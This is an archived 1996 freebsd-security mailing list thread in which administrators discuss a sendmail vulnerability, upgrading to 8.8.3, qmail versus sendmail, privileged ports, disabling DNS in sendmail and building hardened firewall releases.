pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Mon, 18 Nov 1996 15:05:38 +1030." <9611180435.AA17191@communica.com.au> Date: Mon, 18 Nov 1996 08:37:34 +0100 Message-ID: <9222.848302654@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk In message <9611180435.AA17191@communica.com.au>, Mark Newton writes: >port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP >ports less than 1024 can only be allocated by a privileged user. TCP/IP >implementations on non-UNIX platforms disagree violently with this >assumption, which makes the value of this "security" feature rather dubious. Well, it's on the standard, so I wouldn't call it UNIX-centric. I also think you have not quite grasped this feature at all. What you can use if for is this: IFF i trust this machine AND the port is < 1024 THEN I know that I'm dealing with something the administrator setup. ELSE God knows. If you don't trust the machine, and you shouldn't unless you know how it's administrated, the port# is meaningless. -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Sun Nov 17 23:49:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA20103 for security-outgoing; Sun, 17 Nov 1996 23:49:06 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA20060 for ; Sun, 17 Nov 1996 23:48:40 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id XAA14898; Sun, 17 Nov 1996 23:48:23 -0800 (PST) From: Don Lewis Message-Id: <199611180748.XAA14898@salsa.gv.ssi1.com> Date: Sun, 17 Nov 1996 23:48:22 -0800 In-Reply-To: roberto@keltia.freenix.fr (Ollivier Robert) "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 7:06am) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: roberto@keltia.freenix.fr (Ollivier Robert), freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 7:06am, Ollivier Robert wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } According to Don Lewis: } > Qmail doesn't do all the ESMTP negotiation that sendmail does. It keeps } > qmail simpler and less likely to be buggy, but not as functional. For } > instance sendmail 8.7.x supports: 8BITMIME, SIZE, DSN, VERB, ONEX, but } > whatever version of qmail I just checked only supports 8BITMIME and } > PIPELINING. Sendmail 8.8.x adds ETRN. } } I don't think it handles 8BITMIME at all even if it announces it. Does it } support rewriting from 8bit to 7bit and reverse ? I think you may be right. I seem to recall from the discussions on comp.mail.sendmail that qmail only announces this to keep sendmail from doing an 8->7 rewrite. Other than that, qmail just sends 8 bits even if it is talking to some crusty old mailer that strips of the eighth bit or just goes bezerk when it receives a message containing characters with the high bit set. } > Sendmail's support of UUCP isn't wonderful (mostly a problem of } > getting DNS totally disabled). How well does qmail support UUCP? } } That's a common misunderstanding. UUCP support in sendmail is pretty good } (see my other mail). I would have been a lot happier in my UUCP email days if sendmail had supported BSMTP (I think there was a version that did, but it wasn't the one I was running). --- Truck From owner-freebsd-security Sun Nov 17 23:55:22 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA20474 for security-outgoing; Sun, 17 Nov 1996 23:55:22 -0800 (PST) Received: from offensive.communica.com.au (offensive-eth1.adl.communica.com.au [192.82.222.18]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA20394 for ; Sun, 17 Nov 1996 23:53:18 -0800 (PST) Received: from communica.com.au (frenzy.communica.com.au [192.82.222.65]) by offensive.communica.com.au (8.7.6/8.7.3) with SMTP id SAA00388; Mon, 18 Nov 1996 18:21:37 +1030 (CST) Received: by communica.com.au (4.1/SMI-4.1) id AA18891; Mon, 18 Nov 96 18:21:30 CDT From: newton@communica.com.au (Mark Newton) Message-Id: <9611180751.AA18891@communica.com.au> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). To: phk@critter.tfs.com (Poul-Henning Kamp) Date: Mon, 18 Nov 1996 18:21:30 +1030 (CST) Cc: newton@communica.com.au, msmith@atrad.adelaide.edu.au, imp@village.org, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG In-Reply-To: <9222.848302654@critter.tfs.com> from "Poul-Henning Kamp" at Nov 18, 96 08:37:34 am X-Mailer: ELM [version 2.4 PL21] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk Poul-Henning Kamp wrote: > In message <9611180435.AA17191@communica.com.au>, Mark Newton writes: > >port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP > >ports less than 1024 can only be allocated by a privileged user. TCP/IP > >implementations on non-UNIX platforms disagree violently with this > >assumption, which makes the value of this "security" feature rather dubious. > > Well, it's on the standard, so I wouldn't call it UNIX-centric. It's the standard in the UNIX world (that's why I called it UNIX-centric). non-UNIX implementations of TCP/IP don't even necessarily run on machines which support the concept of superuser, and out of those which do some don't restrict < 1024 to privileged users. > I also think you have not quite grasped this feature at all. I have grasped the feature; I know precisely what it is attempting to achieve. I just see it as a relic from days-gone-by when the only systems on the planet which ran TCP/IP were UNIX machines. > IFF i trust this machine AND the port is < 1024 THEN ^^^^^^^^^^^^^^^^^^^^^^^^ This is the bit that breaks down on the Internet. If you don't trust the machine at the other end, all bets are off. > If you don't trust the machine, and you shouldn't unless you know how > it's administrated, the port# is meaningless. Precisely. And I've never attempted to imply anything more or less than this. This is just a diversion, btw. We now return you to your regularly scheduled Subject: lines :-) - mark --- Mark Newton Email: newton@communica.com.au Systems Engineer Phone: +61-8-8373-2523 Communica Systems WWW: http://www.communica.com.au From owner-freebsd-security Sun Nov 17 23:57:03 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id XAA20649 for security-outgoing; Sun, 17 Nov 1996 23:57:03 -0800 (PST) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id XAA20542; Sun, 17 Nov 1996 23:56:20 -0800 (PST) Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id IAA09369; Mon, 18 Nov 1996 08:56:18 +0100 (MET) To: Don Lewis cc: Marc Slemko , Warner Losh , Mark Newton , freebsd-security@FreeBSD.org Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Sun, 17 Nov 1996 23:31:33 PST." <199611180731.XAA14862@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 08:56:18 +0100 Message-ID: <9367.848303778@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk In message <199611180731.XAA14862@salsa.gv.ssi1.com>, Don Lewis writes: >On Nov 17, 10:30pm, Marc Slemko wrote: >} Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). > >} I have a grand scheme for a program that is a frontend to things like: >} - removing the setuid bit from programs you don't use, and >} giving you a nice explaination of what the effects are > >I'd like to be able to do "make release" to get a binary release with >this already taken care of to make installation easier. I'd also like >the release to have unnecessary stuff like compilers and include files >removed. Well, look at /usr/src/release :-) Actually I know you already are, thanks for the help so far! -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Mon Nov 18 00:05:12 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA21221 for security-outgoing; Mon, 18 Nov 1996 00:05:12 -0800 (PST) Received: from sequent.kiae.su (sequent.kiae.su [193.125.152.6]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id AAA21107 for ; Mon, 18 Nov 1996 00:04:24 -0800 (PST) Received: by sequent.kiae.su id AA26657 (5.65.kiae-2 ); Mon, 18 Nov 1996 11:59:29 +0400 Received: by sequent.KIAE.su (UUMAIL/2.0); Mon, 18 Nov 96 11:59:28 +0400 Received: (from ache@localhost) by nagual.ru (8.8.2/8.8.2) id KAA00591; Mon, 18 Nov 1996 10:49:48 +0300 (MSK) Message-Id: <199611180749.KAA00591@nagual.ru> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from "Marc Slemko" at "Nov 17, 96 09:18:29 pm" To: marcs@znep.com (Marc Slemko) Date: Mon, 18 Nov 1996 10:49:48 +0300 (MSK) Cc: freebsd-security@FreeBSD.org From: "=?KOI8-R?Q?=E1=CE=C4=D2=C5=CA_=FE=C5=D2=CE=CF=D7?=" (Andrey A. Chernov) Organization: self X-Class: Fast X-Mailer: ELM [version 2.4ME+ PL28 (25)] Mime-Version: 1.0 Content-Type: text/plain; charset=KOI8-R Content-Transfer-Encoding: 8bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > Incorrect. Sendmail still attempts a lookup for something, I think it is > the local hostname, for each piece of mail it processes. Last I checked, > this could NOT be disabled without recompiling sendmail. Modifying your > config file or adding a service.switch file does not stop it. Of course you must use FEATURE(nocanonify) FEATURE(nodns) in addition to /etc/service.switch, I just not mention obvious things. > On Mon, 18 Nov 1996, [KOI8-R] áÎÄŌÅĘ þÅŌÎÏŨ wrote: > > > > Sendmail's support of UUCP isn't wonderful (mostly a problem of > > > getting DNS totally disabled). How well does qmail support UUCP? > > > > It is possible to totally disable DNS via > > > > /etc/service.switch: > > # To disable DNS search for sendmail > > hosts files -- Andrey A. Chernov http://www.nagual.ru/~ache/ From owner-freebsd-security Mon Nov 18 00:29:58 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA22206 for security-outgoing; Mon, 18 Nov 1996 00:29:58 -0800 (PST) Received: from procert.cert.dfn.de (procert.cert.dfn.de [134.100.14.1]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA22196; Mon, 18 Nov 1996 00:29:37 -0800 (PST) Received: from tiger.cert.dfn.de (ley@tiger.cert.dfn.de [134.100.14.11]) by procert.cert.dfn.de (8.8.3/8.8.3) with ESMTP id JAA25369; Mon, 18 Nov 1996 09:30:27 +0100 (MET) From: Wolfgang Ley Received: (from ley@localhost) by tiger.cert.dfn.de (8.8.3/8.8.3) id JAA15522; Mon, 18 Nov 1996 09:30:25 +0100 (MET) Message-Id: <199611180830.JAA15522@tiger.cert.dfn.de> Subject: Re: New sendmail bug... To: spork@super-g.com (S) Date: Mon, 18 Nov 1996 09:30:25 +0100 (MET) Cc: eric@sendmail.org, igor@alecto.physics.uiuc.edu, roberto@keltia.freenix.fr, freebsd-security@FreeBSD.org, freebsd-hackers@FreeBSD.org In-Reply-To: from "S" at Nov 17, 96 09:39:11 pm Organization: DFN-CERT (Computer Emergency Response Team, Germany) Content-Type: text Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk -----BEGIN PGP SIGNED MESSAGE----- S wrote: > > But if one does have to run 8.7.6 until they have time to breath, does > anyone know if the error that Igor and I are seeing compiling 8.7.6 from [...] That's simply wrong. sendmail 8.7 - 8.8.2 is affected (which includes sendmail 8.7.6). Install 8.8.3 to fix the bug. Bye, Wolfgang. - -- Wolfgang Ley, DFN-CERT, Vogt-Koelln-Str. 30, 22527 Hamburg, Germany Email: ley@cert.dfn.de Phone: +49 40 5494-2262 Fax: +49 40 5494-2241 PGP-Key available via finger ley@ftp.cert.dfn.de any key-server or via WWW from http://www.cert.dfn.de/~ley/ ...have a nice day -----BEGIN PGP SIGNATURE----- Version: 2.6.2i iQCVAwUBMpAengQmfXmOCknRAQGqjwP9Fw/SroRZ/+IjZygCpjNOdugjY7R1/W42 o4VdoakPR803j5+VpJDxOFvizckhQ+6JAAJZU0DMTE+Fq9BLQaDqsVIJE5C85I0s Xw9jF7cGJLcKXiNSUXLLooMdfac+lHFLNE3svLZ/F4rpCP21TWhaiIBsnxHXlY5d s8+Md6kQTDI= =qIVB -----END PGP SIGNATURE----- From owner-freebsd-security Mon Nov 18 00:41:06 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id AAA22775 for security-outgoing; Mon, 18 Nov 1996 00:41:06 -0800 (PST) Received: from critter.tfs.com ([140.145.230.177]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id AAA22763; Mon, 18 Nov 1996 00:40:47 -0800 (PST) Received: from critter.tfs.com (localhost.phk.dk [127.0.0.1]) by critter.tfs.com (8.8.2/8.8.2) with ESMTP id JAA09423; Mon, 18 Nov 1996 09:41:08 +0100 (MET) To: newton@communica.com.au (Mark Newton) cc: msmith@atrad.adelaide.edu.au, imp@village.org, batie@agora.rdrop.com, adam@homeport.org, pgiffuni@fps.biblos.unal.edu.co, freebsd-security@FreeBSD.ORG Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-reply-to: Your message of "Mon, 18 Nov 1996 18:21:30 +1030." <9611180751.AA18891@communica.com.au> Date: Mon, 18 Nov 1996 09:41:07 +0100 Message-ID: <9421.848306467@critter.tfs.com> From: Poul-Henning Kamp Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk In message <9611180751.AA18891@communica.com.au>, Mark Newton writes: >Poul-Henning Kamp wrote: > > > In message <9611180435.AA17191@communica.com.au>, Mark Newton writes: > > >port 25 as a daemon is because of the rather UNIX-centric view that TCP/IP > > >ports less than 1024 can only be allocated by a privileged user. TCP/IP > > >implementations on non-UNIX platforms disagree violently with this > > >assumption, which makes the value of this "security" feature rather dubiou >s. > > > > Well, it's on the standard, so I wouldn't call it UNIX-centric. > >It's the standard in the UNIX world (that's why I called it UNIX-centric). >non-UNIX implementations of TCP/IP don't even necessarily run on machines >which support the concept of superuser, and out of those which do some >don't restrict < 1024 to privileged users. Read the host-requirements RFC and become wiser. > > I also think you have not quite grasped this feature at all. > >I have grasped the feature; I know precisely what it is attempting to >achieve. I just see it as a relic from days-gone-by when the only systems >on the planet which ran TCP/IP were UNIX machines. Well, you still havn't grasped it. I say it again, because I'm sure you didn't: Read the host-requirements RFC and become wiser. > > > IFF i trust this machine AND the port is < 1024 THEN > ^^^^^^^^^^^^^^^^^^^^^^^^ >This is the bit that breaks down on the Internet. If you don't trust >the machine at the other end, all bets are off. Of course. That is rather evident. But it so happens that I do trust some machines, or rather the people behind the machines, and then this feature comes handy. -- Poul-Henning Kamp | phk@FreeBSD.ORG FreeBSD Core-team. http://www.freebsd.org/~phk | phk@login.dknet.dk Private mailbox. whois: [PHK] | phk@ref.tfs.com TRW Financial Systems, Inc. Future will arrive by its own means, progress not so. From owner-freebsd-security Mon Nov 18 01:18:55 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id BAA25007 for security-outgoing; Mon, 18 Nov 1996 01:18:55 -0800 (PST) Received: from salsa.gv.ssi1.com (salsa.gv.ssi1.com [146.252.44.194]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id BAA25001; Mon, 18 Nov 1996 01:18:44 -0800 (PST) Received: (from gdonl@localhost) by salsa.gv.ssi1.com (8.7.5/8.7.3) id BAA15007; Mon, 18 Nov 1996 01:18:36 -0800 (PST) From: Don Lewis Message-Id: <199611180918.BAA15007@salsa.gv.ssi1.com> Date: Mon, 18 Nov 1996 01:18:36 -0800 In-Reply-To: Michael Smith "Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2)." (Nov 18, 7:11pm) X-Mailer: Mail User's Shell (7.2.6 alpha(3) 7/19/95) To: Michael Smith Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: chat@freebsd.org, security@freebsd.org Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk On Nov 18, 7:11pm, Michael Smith wrote: } Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). } (This has nothing to do with security. Moved to -chat where such drool } belongs) Actually, it is security related (see my response to (b)): } Don Lewis stands accused of saying: } > } > I'd like to be able to do "make release" to get a binary release with } > this already taken care of to make installation easier. I'd also like } > the release to have unnecessary stuff like compilers and include files } > removed. } } a) You can fiddle 'make release' to do anything you want, after all, you } have the source, right? Yes, but it's a lot harder than I'd like. } b) Removing the compiler and "unnecessary" stuff may be less useful than } you think. But if you're determined to force people to use the GENERIC } kernel, then go ahead and do it. I'm sure _someone_ will love you, } although these would be the people who were happy when Sun and SCO did } the same thing. *snort* I'm doing this to make building firewall boxes easier. The kernel won't be GENERIC, it'll be a pre-configured ultra-paranoid kernel. There won't be any general user accounts. Administrative access will only be allowed from the console or via ssh from a trusted location. Most of userland will only be removed (especially setuid and setgid executables!), leaving only enough to boot the machine and launch the appropriate daemons that were precompiled and included in the release. In case the machine is compromised or the disk blows up, it is reloaded from a trusted source (not from a backup tape that some cracker managed to leave a back door in). I want this to be an easy task and not require five hours answering questions, editing files, and deleting stuff. Since I'll be the only person logging in, and I won't be compiling any code on that machine, I don't need a compiler, and I don't want to make it any easier than necessary for some cracker d00d to compile his r00t kit. And on more of a chat related note, there is a discussion going on over on the hardware list about using FreeBSD for routers. What if was easier to build really tiny releases for such purposes? If they were small enough, you could get it to all fit on a floppy (sort of like the current install floppy) and you could build a router or other simple dedicated device without a hard disk at all. You'd still need a full FreeBSD box around to do development on, but this would allow you to deploy a number of really cheap FreeBSD boxes on your network as dedicated devices. Please follow up only to the appropriate places. --- Truck From owner-freebsd-security Mon Nov 18 02:15:13 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id CAA28081 for security-outgoing; Mon, 18 Nov 1996 02:15:13 -0800 (PST) Received: from mail.id.net (mail.id.net [199.125.1.6]) by freefall.freebsd.org (8.7.5/8.7.3) with ESMTP id CAA28076 for ; Mon, 18 Nov 1996 02:15:04 -0800 (PST) Received: from server.id.net (server.id.net [199.125.1.10]) by mail.id.net (8.7.5/ID-Net) with ESMTP id FAA11457; Mon, 18 Nov 1996 05:19:53 -0500 (EST) Received: (from rls@localhost) by server.id.net (8.7.5/8.7.3) id FAA11340; Mon, 18 Nov 1996 05:15:05 -0500 (EST) From: Robert Shady Message-Id: <199611181015.FAA11340@server.id.net> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from Marc Slemko at "Nov 17, 96 11:55:33 pm" To: marcs@znep.com (Marc Slemko) Date: Mon, 18 Nov 1996 05:15:04 -0500 (EST) Cc: roberto@keltia.freenix.fr, freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL25 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk > Incorrect. It RUNS without DNS but still TRIES to use it. If you really > don't have IP connectivity, then difference doesn't matter because it > still works when the lookup fails, however it still does try and the > difference does matter if you have partial IP connectivity. I have a > system setup with nocanonify and all the other config file tweaks I know > of, and it still tries to use DNS as a tcpdump shows quite clearly. This > system is running 8.7.5, so things may have been changed in more recent > versions but I can't say for sure; if this has changed in more recent > versions, please let me know. > > I _think_ the define that needs to be set to 0 is NAMED_BIND, but don't > recall for sure. This has been gone over before on the lists. Out of curiosity, what interface exactly are you looking at if you aren't running tcp/ip? -- Rob === _/_/_/_/_/ _/_/_/_/ _/_/ _/ _/_/_/_/_/ _/_/_/_/_/ _/ _/ _/ _/_/_/ _/ _/ _/ _/_/_/_/ _/ _/_/_/_/_/ _/_/_/_/ _/ _/ _/_/_/_/_/ _/ Innovative Data Services Serving South-Eastern Michigan Internet Service Provider / Hardware Sales / Consulting Services Voice: (810)855-0404 / Fax: (810)855-3268 / Web: http://www.id.net From owner-freebsd-security Mon Nov 18 04:24:07 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA06612 for security-outgoing; Mon, 18 Nov 1996 04:24:07 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA06592 for ; Mon, 18 Nov 1996 04:23:54 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id HAA12293; Mon, 18 Nov 1996 07:20:17 -0500 From: Adam Shostack Message-Id: <199611181220.HAA12293@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from Warner Losh at "Nov 17, 96 09:45:35 pm" To: imp@village.org (Warner Losh) Date: Mon, 18 Nov 1996 07:20:16 -0500 (EST) Cc: freebsd-security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk Warner Losh wrote: | In message <9611180312.AA15775@communica.com.au> Mark Newton writes: | : Removing shell escapes from .forward is, IMHO, of a similar league to | : disabling the functionality of .rhosts files. Shell escapes are, and always | : have been, a feature which permits unaccountable abuses of security to | : provide "ease of use" which only a small subset of users really care about. | I'm sorry, but that is not an acceptible answer in a general purpose | OS. What you do on your system is OK, but that is *NOT* a good reason | to remove sendmail from the base OS. People expect the ability to run | whatever they please, or at least a subset selected by the admin. In | order to do that, the mail agent must run as that person. In order to | do that, the mail agent must either run a setuid program that is | accessible to the mail delivery agent (and likely others), or it must | run as root. The Mail Delivery Agent must run as root, and set its uid to recipient. I've used a non-root sendmail with setuid procmail to make this work just fine. We should all be thinking in terms of seperation of privledge and least privledge. Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Mon Nov 18 04:27:36 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id EAA07238 for security-outgoing; Mon, 18 Nov 1996 04:27:36 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id EAA07233 for ; Mon, 18 Nov 1996 04:27:23 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id HAA12303; Mon, 18 Nov 1996 07:23:29 -0500 From: Adam Shostack Message-Id: <199611181223.HAA12303@homeport.org> Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). In-Reply-To: from Ollivier Robert at "Nov 18, 96 06:59:34 am" To: roberto@keltia.freenix.fr (Ollivier Robert) Date: Mon, 18 Nov 1996 07:23:29 -0500 (EST) Cc: freebsd-security@FreeBSD.org X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk Ollivier Robert wrote: | According to Adam Shostack: | > planning to replace sendmail with qmail real soon, and that helps me a | > lot. My suggestion was meant to imply the possibility of removing | > sendmail from the FreeBSD distribution, and only shipping qmail. | | I'd strongly object to this. In addition of what Warner said I must add | that qmail's UUCP support is noneexitent or rather anti-UUCP in the sense | that it generates multiple messages when a mail has multiple recipient. | | I manage several mailing-lists on my home machine and am the administrator | of another one with lots of UUCP users and qmail is unusable. While you raise a valid point, which is UUCP still exists, does it exist in the majority of systems out there? If not, should the default system config include a mailer which is archetecturally incapable of being secure? I can't object to your need, and the need of some others, to keep UUCP going, but I'm not convinced that it should be the default for most people. | I still can't bear the configuration system of qmail (lots of .qmail-mumble | everywhere, user defined mailing-lists that can't be disabled) and the | author's attitude in general[1] (but that's another problem). I'll agree with you wholeheartedly here. Lastly, it seems that author attitude are inseperable from the kind of hubris needed to write an MTA. :} Adam -- "It is seldom that liberty of any kind is lost all at once." -Hume From owner-freebsd-security Mon Nov 18 05:57:28 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id FAA12511 for security-outgoing; Mon, 18 Nov 1996 05:57:28 -0800 (PST) Received: from postoffice.cso.uiuc.edu (postoffice.cso.uiuc.edu [128.174.5.11]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id FAA12470; Mon, 18 Nov 1996 05:57:20 -0800 (PST) Received: from alecto.physics.uiuc.edu (alecto.physics.uiuc.edu [128.174.83.167]) by postoffice.cso.uiuc.edu (8.6.12/8.6.12) with ESMTP id HAA134502; Mon, 18 Nov 1996 07:54:21 -0600 Received: by alecto.physics.uiuc.edu (940816.SGI.8.6.9/940406.SGI) id HAA04064; Mon, 18 Nov 1996 07:54:00 -0600 Date: Mon, 18 Nov 1996 07:54:00 -0600 From: igor@alecto.physics.uiuc.edu (Igor Roshchin) Message-Id: <199611181354.HAA04064@alecto.physics.uiuc.edu> To: spork@super-g.com (S), Wolfgang Ley Subject: Re: New sendmail bug... Cc: freebsd-hackers@FreeBSD.org, freebsd-security@FreeBSD.org, roberto@keltia.freenix.fr, igor@alecto.physics.uiuc.edu, eric@sendmail.org Sender: owner-security@FreeBSD.org X-Loop: FreeBSD.org Precedence: bulk >From ley@cert.dfn.de Mon Nov 18 02:33:06 1996 S wrote: > > But if one does have to run 8.7.6 until they have time to breath, does > anyone know if the error that Igor and I are seeing compiling 8.7.6 from [...] That's simply wrong. sendmail 8.7 - 8.8.2 is affected (which includes sendmail 8.7.6). Install 8.8.3 to fix the bug. Bye, Wolfgang. This is not the right aproach. 1. As somebody has written, people should be able to get sendmail from *.freebsd.org without digging for it. sup.freebsd.org had just 8.7.6 with the patch in question. 2. The patch in question SHOULD work (Somebody showed that the line being discussed is not that important) 3. In general (although it does not seem to be the case now), transition from one version to another one is not a painless process, because of configuration files This situation can be more sofisticated when you have a cluster of computers with different platforms with common infrastucture. (I am not getting into details, you know them better than me) IgoR From owner-freebsd-security Mon Nov 18 07:08:17 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA20243 for security-outgoing; Mon, 18 Nov 1996 07:08:17 -0800 (PST) Received: from rover.village.org (rover.village.org [204.144.255.49]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA20231 for ; Mon, 18 Nov 1996 07:08:08 -0800 (PST) Received: from rover.village.org [127.0.0.1] by rover.village.org with esmtp (Exim 0.56 #1) id E0vPVIl-0004Qy-00; Mon, 18 Nov 1996 08:07:59 -0700 To: Poul-Henning Kamp Subject: Re: BoS: Exploit for sendmail smtpd bug (ver. 8.7-8.8.2). Cc: freebsd-security@freebsd.org In-reply-to: Your message of "Mon, 18 Nov 1996 08:30:43 +0100." <9172.848302243@critter.tfs.com> References: <9172.848302243@critter.tfs.com> Date: Mon, 18 Nov 1996 08:07:59 -0700 From: Warner Losh Message-Id: Sender: owner-security@freebsd.org X-Loop: FreeBSD.org Precedence: bulk In message <9172.848302243@critter.tfs.com> Poul-Henning Kamp writes: : How's that for security ? Cool! Warner From owner-freebsd-security Mon Nov 18 07:14:14 1996 Return-Path: owner-security Received: (from root@localhost) by freefall.freebsd.org (8.7.5/8.7.3) id HAA20898 for security-outgoing; Mon, 18 Nov 1996 07:14:14 -0800 (PST) Received: from kdat.calpoly.edu (kdat.csc.calpoly.edu [129.65.54.101]) by freefall.freebsd.org (8.7.5/8.7.3) with SMTP id HAA20884 for ; Mon, 18 Nov 1996 07:14:05 -0800 (PST) Received: (from nlawson@localhost) by kdat.calpoly.edu (8.6.12/N8) id HAA03689; Mon, 18 Nov 1996 07:10:45 -0800 From: Nathan Lawson Message-Id: <199611181510.HAA03689@kdat.calpoly.edu> Subject: Re: grand alternatives to chroot, solution to the age-old root problem To: dreamer@garrison.inetcan.net (Digital Dreamer) Date: Mon, 18 Nov 1996 07:10:44 -0800 (PST) In-Reply-To: from "Digital Dreamer" at Nov 17, 96 03:31:15 pm X-Mailer: ELM [version 2.4 PL23] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-security@FreeBSD.ORG X-Loop: FreeBSD.org Precedence: bulk > On Sun, 17 Nov 1996, az.com wrote: > > > No longer do you have to worry about whether they have root or not - in > > fact each user gets to be root! (in their own machine, of course ;) ) If > > they want to hack, get fancy, reboot, etc. - its up to them - its *their* > > system, not yours. > > > > If they blow out the virtual OS space because they gave their password out > > to a grommet or made a mistake, you simply run a utility which checks and > > repairs virtual file system's partitions and refreshes the virtual > > 'environment's' OS from a template. > > Sounds nice, but kind of impractical. There's no unice (AFAIK) whose > kernel could do this without essentially being rewritten. Besides, > there's still the possibility of kernel bugs that would let you break out > of your vm and get into that of others. Back when I first started using UNIX, the school had an IBM 3090 running VM. It has virtual machines and ran AIX, CMS, and several other OS's. All were separate from each other and seemed to run fine, albeit a bit slowly (they were trying to spool all the school's news through it :) Various trusted OS's use the VM concept. -- Nate Lawson "There are a thousand hacking at the branches of CPE Senior evil to one who is striking at the root." CSL Admin -- Henry David Thoreau, 'Walden', 1854 From owner-freebsd-security Mon Nov 18 07:15:26 1996 Return-Path: owner-security 